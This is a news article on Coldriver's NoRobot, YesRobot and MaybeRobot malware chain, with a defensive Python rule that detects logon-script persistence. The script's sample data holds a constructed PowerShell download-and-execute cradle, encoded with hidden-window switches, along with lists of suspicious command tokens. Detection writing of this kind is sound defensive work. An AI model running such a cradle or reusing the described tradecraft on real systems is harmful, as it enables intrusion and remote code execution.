The Russian-affiliated hacking group Coldriver has been observed deploying a new malware set, according to researchers at the Google Threat Intelligence Group (GTIG).
This malware set, made up of several families linked in a single delivery chain, appears to have replaced Coldriver’s previous primary malware, LostKeys, since that tool was publicly disclosed in May 2025, according to a GTIG report published on October 20.
The researchers noted that the new set has been used more aggressively than in any previous malware campaign attributed to the group.
This indicates a rapidly increased development and operations tempo from Coldriver, according to GTIG.
Coldriver’s Previous Campaigns
Coldriver, also known as Star Blizzard, Callisto and UNC4057, is a threat group assessed to have links to Russia’s Federal Security Service (FSB).
Active since at least 2017, the group is known to focus on credential phishing campaigns targeting high-profile NGOs, former intelligence and military officers and NATO governments for espionage purposes.
In December 2023, the UK’s National Cyber Security Centre (NCSC) said the group was behind a sustained cyber campaign aimed at interfering in UK politics and democratic processes.
In January 2024, Google observed the group going beyond phishing for credentials to delivering malware capable of exfiltrating sensitive information from the target.
In May 2025, GTIG detected that Coldriver had used a new malware strain, called LostKeys, in malicious campaigns between January and March of the same year.
This new strain has not been observed since the publication of the disclosure, GTIG said in its new October 20 report.
Inside Coldriver’s NoRobot, YesRobot and MaybeRobot
Instead, Coldriver appears to have shifted to a new set of malware families, tracked by Google as NoRobot, YesRobot and MaybeRobot.
The attack starts with a ‘ClickFix-style’ phishing lure, a fake CAPTCHA page designed to trick the victim into thinking they must verify they’re “not a robot.” This lure is tracked by Google as ColdCopy.
The page prompts the user to download a malicious dynamic-link library (DLL), tracked as NoRobot, and run it through rundll32.exe, a signed Windows binary that loads a DLL and calls one of its exported functions. The export NoRobot exposes is named humanCheck, reinforcing the CAPTCHA deception.
Because the initial execution goes through rundll32.exe rather than the PowerShell one-liners used in earlier ClickFix campaigns, tooling that keys on PowerShell script execution sees nothing at this stage; defenders instead need to watch what rundll32.exe is asked to load, from where, and on whose behalf.
Once executed, the NoRobot DLL acts as a downloader. Early versions used a split-key scheme: the decryption key for the next stage was assembled from fragments stored in separately downloaded files and in the Windows Registry (for example under HKEY_CURRENT_USER\SOFTWARE\Classes\.pietas). An analyst who recovers only some of these components cannot decrypt the payload, which slows analysis.
NoRobot then fetches a self-extracting Python 3.8 installer and two encrypted Python scripts (libsystemhealthcheck.py and libcryptopydatasize.py) from a malicious domain, inspectguarantee[.]org, and registers a scheduled task so the malware survives reboots.
Together, the two scripts decrypt and launch a minimal Python-based first-stage backdoor, tracked as YesRobot, which communicates with a hardcoded command-and-control (C2) server over HTTPS.
GTIG noted that Coldriver abandoned YesRobot after just two weeks, likely because it was too cumbersome and easy to detect – notably because of the Python installation.
The researchers suggested that YesRobot served as a temporary stopgap after the group’s previous malware, LostKeys, was exposed.
Around June 2025, Coldriver switched to MaybeRobot, a more flexible PowerShell-based backdoor, with no Python script needed.
In this new version, NoRobot was simplified to fetch a single script that persists MaybeRobot by adding a PowerShell command to the user’s logon script.
MaybeRobot uses a custom C2 protocol with three core commands:
- Download and execute a file from a URL
- Run a command via cmd.exe
- Execute a PowerShell block
Unlike YesRobot, MaybeRobot’s design is extensible: operators can push arbitrary commands or PowerShell blocks at runtime, but the backdoor itself still lacks built-in capabilities such as automatic data exfiltration.
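As an added example of how the logon-script persistence described above could be caught (this is not code from the GTIG or Zscaler reports), the Python below runs two rules over constructed Sysmon registry value-set (Event ID 13) records. The first flags writes to the per-user UserInitMprLogonScript value, the standard Windows logon-script location (MITRE ATT&CK T1037.001); the report does not say which value Coldriver used, so that location is an assumption. Where the written data invokes an interpreter, any -EncodedCommand payload is decoded from UTF-16LE Base64 so the real command is visible in the alert. The second rule flags writes under the SOFTWARE\Classes\.pietas key named in the report for the early NoRobot variant. Sample events, SIDs, hostnames and the staged URL are constructed.

```python
import base64
import re

# Standard per-user logon script value (T1037.001). Sysmon reports it under HKU\<SID>\...;
# a live check would read HKEY_CURRENT_USER\Environment\UserInitMprLogonScript instead.
LOGON_SCRIPT_VALUE = r"\environment\userinitmprlogonscript"
# Registry location the report names for the early split-key NoRobot variant.
NOROBOT_KEY_FRAGMENT = r"\software\classes\.pietas"

INTERPRETERS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript", "rundll32")
# Tokens that make an interpreter invocation worth escalating (heuristic, not from the report).
SUSPICIOUS_TOKENS = ("downloadstring", "downloadfile", "invoke-expression", "iex ",
                     "frombase64string", "-nop", "-w hidden", "-windowstyle hidden", "bypass")
# Common spellings of PowerShell's -EncodedCommand switch followed by its Base64 argument.
_ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(details: str):
    """Return the decoded -EncodedCommand script (PowerShell uses UTF-16LE), or None."""
    m = _ENC_RE.search(details)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess_registry_event(event: dict):
    """Apply both rules to one value-set event; return a finding dict or None."""
    target = event.get("TargetObject", "").lower()
    details = event.get("Details", "")
    if target.endswith(LOGON_SCRIPT_VALUE):
        reasons = ["per-user logon script value set (T1037.001)"]
        lowered = details.lower()
        if any(i in lowered for i in INTERPRETERS):
            reasons.append("value invokes a script interpreter")
        decoded = decode_encoded_command(details)
        searchable = lowered + " " + (decoded.lower() if decoded else "")
        hits = [t for t in SUSPICIOUS_TOKENS if t in searchable]
        if hits:
            reasons.append("suspicious tokens: " + ", ".join(hits))
        return {"rule": "logon-script-persistence",
                "severity": "high" if len(reasons) > 1 else "low",
                "image": event.get("Image"), "details": details,
                "decoded": decoded, "reasons": reasons}
    if NOROBOT_KEY_FRAGMENT in target:
        return {"rule": "norobot-split-key-registry-component", "severity": "medium",
                "image": event.get("Image"), "details": details, "decoded": None,
                "reasons": ["write under HKCU\\SOFTWARE\\Classes\\.pietas"]}
    return None


def triage(events):
    """Run the rules over a batch of events and return all findings in input order."""
    return [f for f in (assess_registry_event(e) for e in events) if f is not None]


# Constructed sample data. The inner command is a generic download cradle, not MaybeRobot's.
INNER_COMMAND = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage.ps1')"
ENCODED = base64.b64encode(INNER_COMMAND.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\System32\rundll32.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Environment\UserInitMprLogonScript",
     "Details": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"EventID": 13, "Image": r"C:\Windows\System32\rundll32.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\SOFTWARE\Classes\.pietas\(Default)",
     "Details": "a1b2c3d4"},
    {"EventID": 13, "Image": r"C:\Windows\System32\userinit.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1002\Environment\UserInitMprLogonScript",
     "Details": r"\\files.corp.example\netlogon\mapdrives.bat"},
    {"EventID": 13, "Image": r"C:\Program Files\App\app.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1002\Software\App\LastRun",
     "Details": "2025-10-20"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["severity"], f["rule"], f["image"], "; ".join(f["reasons"]))
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

A logon-script write that merely points at a batch file on a file share is reported at low severity so an analyst can confirm it against group policy, while a write whose data launches PowerShell with hidden-window and encoded-command switches is escalated with the decoded cradle attached.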
Coldriver Alternates Noisy and Stealthy NoRobot Infection Chains
Between June and September 2025, Coldriver evolved NoRobot, alternating between simplified and complex infection chains to hinder analysis while ensuring reliable delivery of its MaybeRobot PowerShell backdoor.
Minor but frequent changes, such as rotating infrastructure, filenames, and export functions, demonstrate Coldriver’s adaptive tradecraft, forcing defenders to capture multiple components to fully reconstruct attacks.
The GTIG report builds on a September Zscaler report, in which NoRobot is tracked as BaitSwitch and MaybeRobot as SimpleFix.